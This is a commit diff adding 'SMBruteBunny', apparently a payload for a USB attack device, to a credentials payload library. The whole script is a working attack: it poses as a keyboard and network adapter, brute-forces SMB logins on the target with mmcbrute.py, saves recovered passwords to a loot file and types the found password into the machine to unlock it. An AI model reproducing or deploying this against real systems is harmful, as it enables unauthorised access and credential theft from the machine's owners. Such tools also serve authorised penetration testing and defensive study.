Create payload.txt

payloads/library/credentials/SMBruteBunny/payload.txt

@@ -0,0 +1,39 @@
+#!/bin/bash
+#
+# Title: SMBruteBunny
+# Author: Mohamed A. Baset (@SymbianSyMoh)
+# PS: This is the shittiest bash script you'll ever see :D
+
+password_process_file="$ORIGINAL_SWITCH/ppf.txt"
+password_to_quack="$ORIGINAL_SWITCH/p2q.txt"
+password_loot_file="$ORIGINAL_SWITCH/credentials.txt"
+user_bruteforce_list="$ORIGINAL_SWITCH/userlist.txt"
+pass_bruteforce_list="$ORIGINAL_SWITCH/passlist.txt"
+
+# Setup
+LED SETUP
+ATTACKMODE HID RNDIS_ETHERNET
+mount /dev/nandf /root/udisk/
+GET TARGET_IP
+GET TARGET_HOSTNAME
+# Perform SMB bruteforce attack
+LED STAGE1
+python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
+# Check for results
+LED STAGE2
+if grep -q "Success" $password_process_file; then
+LED G
+# Extract and Store the loot, then quack it
+pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2)
+echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file
+echo "$pass" > $password_to_quack
+QUACK $password_to_quack
+QUACK ENTER
+rm $password_to_quack 2> /dev/null
+else
+LED FAIL
+fi
+
+LED CLEANUP
+sync; sleep 1; sync
+LED FINISH